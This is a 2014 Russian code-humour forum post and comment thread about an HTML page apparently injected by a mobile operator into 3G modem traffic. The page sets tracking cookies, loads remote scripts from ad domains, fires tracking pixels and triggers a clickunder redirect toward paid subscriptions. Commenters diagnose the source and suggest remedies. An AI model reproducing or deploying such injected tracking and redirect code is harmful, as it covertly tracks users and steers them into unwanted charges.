1. PHP / Говнокод #16273

    +158

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    67. 67
    68. 68
    69. 69
    <!DOCTYPE html>
    <html>
    <head>
        <title>Pixel Farm</title>
    </head>
    <body>
    <script type="text/javascript">
        function sc(name, val, endh) {
            var exdate = new Date;
            endh = exdate.getHours() + endh;
            exdate.setHours(endh);
            document.cookie = name + "=" + escape(val) + (endh === null ? "" : ";expires=" + exdate.toGMTString() + ";path=/;");
        }
    </script>
    
    <script type="text/javascript">
        var am_lo = function () {
            try {
                return "localStorage" in window && window["localStorage"] !== null;
            } catch (e) {
                return false;
            }
        };
        if (document.cookie.indexOf("uid") === -1) {
            if (am_lo()) {
                var am_lo_uid = localStorage.getItem("uid");
                if (am_lo_uid === null) {
                    am_lo_uid = "5fdf30844eb1823f23ff34a742719b01";
                    localStorage.setItem("uid", am_lo_uid);
                }
            } else {
                var am_lo_uid = "5fdf30844eb1823f23ff34a742719b01";
            }
            var exdate = new Date;
            exdate.setDate(exdate.getDate() + 30);
            document.cookie = "uid=" + am_lo_uid + ";expires=" + exdate.toGMTString() + ";path=/;domain=.am15.net;";
        }
    </script><script type="text/javascript" src="//px10.net/c.php"></script><img src="http://sync2.adsniper.ru/?src=a1" width="1" height="1" /><img src="http://advm.upstats.ru/" width="1px" height="1px" alt="" /><img src="http://advm.upstats.ru/b/" width="1px" height="1px" alt="" />
    <script type="text/javascript">
        function AdvMakerMyragon(r) {
    
           /* var myr4i=document.createElement("img");
            myr4i.src="//w16.am15.net/x/log.php?action=myr4&content="+JSON.stringify(r);
            document.body.appendChild(myr4i);*/
    
            if (r[0]) {
                if (r[0].reply === "positive") {
                    var exdate = new Date;
                    exdate.setMinutes(exdate.getMinutes() + 180);
                    var k = parseInt(r[0].price_id);
                    // document.cookie = "myragon_" + k + "=1;expires=" + exdate.toGMTString() + ";path=/;domain=.am15.net;";
                    // document.cookie = "myragon_" + k + "=1;expires=" + exdate.toGMTString() + ";path=/;domain=am15.net;";
    
                    var name="myragon_" + k;
                    sc(name, 1, 1);
    
                    if (k == 4){
                        var myr4=document.createElement("script");
                        myr4.type="text/javascript";
                        myr4.src="//am15.net/x/myragon.php";
                        document.body.appendChild(myr4);
                    }
                }
            }
        }
    </script>
    <script src="http://t02.rbnt.org/rsc.php?mode=bu&pkey=ffd3337d72b61dd75b3b95f59f9c85be&scr=1&p=advmaker&callback=AdvMakerMyragon&sitename=3517" type="text/javascript"></script><img src="//ad.dumedia.ru/advmaker/pixel" width="1" height="1" alt="" />
    <img src="http://luxup.ru/cmrk/5/?clickunder_url=http%3A%2F%2Fam15.net%2Fx%2Fadlabs.php" width="1" height="1" /></body>
    </html>

    это собственно та самая хрень которая перенаправляет на всякие "полезные" подписки на 3жы модемах мегафон.
    оно у меня вылезает даже на говнокоде, но в сорцах страниц такого нет, пхп гуру, откуда оно берется и кого бить за эту хрень?

    Запостил: pl7ofit, 03 Июля 2014

    Комментарии (20) RSS

    • Загрузись с LiveCD убунты, она умеет в 3G модемы.
      Если пропадёт - поймал вирусняк, если останется - значит, оператор охренел.

      P.S.: до чего дожили, провайдер уже враг по умолчанию...
      Ответить
      • >P.S.: до чего дожили, провайдер уже враг по умолчанию...
        опсосы давно охренели. Use VPN, luke

        Хорошо, что в http 2.0 сделали обязательное шифрование.
        Ответить
        • Оно не обязательное :( Где-то мы тут с Анонимбом уже эту тему разбирали...

          В общем там требуется, чтобы и клиенты и серверы умели в TLS с неким минимальным набором алгоритмов. Но никто не заставляет их это юзать. Т.е., по сути, это вообще ничего не меняет - все браузеры и веб-серваки и так умеют в SSL/TLS.
          Ответить
        • Забодай меня комар, когда успели? Я уже думал, что 1.1 так и останется последней версией стандарта.
          Ответить
          • Гугловский SPDY стандартизируют, переименовав в HTTP/2.0.
            Ответить
      • суть в том что я и так с ляликса сижу, поэтому не вирус
        Ответить
        • Ну тогда можешь поиметь мозг опсосам на тему того, что они модифицируют передаваемые данные и погрозить роскомнадзором.
          На сайте, который называть нельзя, вроде что-то было на эту тему
          Ответить
          • и не исключено, что это прописано в пользовательском соглашении (договоре)
            Ответить
            • Контракту с опсосами позавидует сам диавол, ведь он даже не догадывался включить замечательный пункт об "одностороннем изменении любых условий настоящей оферты с уведомлением через СМИ" и написать мелкими буквами на своем сайте "является СМИ".
              Ответить
              • В таком случае на них должен распространяться закон о СМИ
                Запрещается использование в радио-, теле-, видео-, кинопрограммах, документальных и художественных фильмах, а также в информационных компьютерных файлах и программах обработки информационных текстов, относящихся к специальным средствам массовой информации, скрытых вставок и иных технических приемов и способов распространения информации, воздействующих на подсознание людей и (или) оказывающих вредное влияние на их здоровье
                Ответить
                • Ну дык они своим сайтом и не воздействуют.

                  P.S. Хотя... аутентификация в личном кабинете пчелайна таки оказывает вредное влияние на здоровье - смской присылали цифробуквенный пароль, в котором есть всякие l, I, 1, О и 0.
                  Ответить
                  • t1Xu1l0
                    Ответить
                  • скрытых вставок и иных технических приемов и способов распространения информации
                    Они ж скрытно вставляют во все сайты непонятные скрипты.
                    Ответить
                    • Ну почему скрытно, дорогой, вот же, видно все!
                      Ответить
    • Экстренные новости! [img]Картинка со слоупоком.[/img]
      Мегафон вмешивается в трафик до юзера! Читать далее: http://habrahabr.ru/post/142909/

      P.S. Прошу прощения за ссылку на сайт-который-называть-нельзя.
      Ответить
      • Хм, с мегафоновского модема ссылка не грузится....
        Ответить
        • Ну вот, уже гармонизировали...
          Ответить
        • Здесь нет ничего интересного. Нечего тут смотреть. Быстренько разошлись, пока я не начал всех арестовывать!

          barbady.jpg
          Ответить
      • Волан-дэ-сайт?
        Ответить

    Добавить комментарий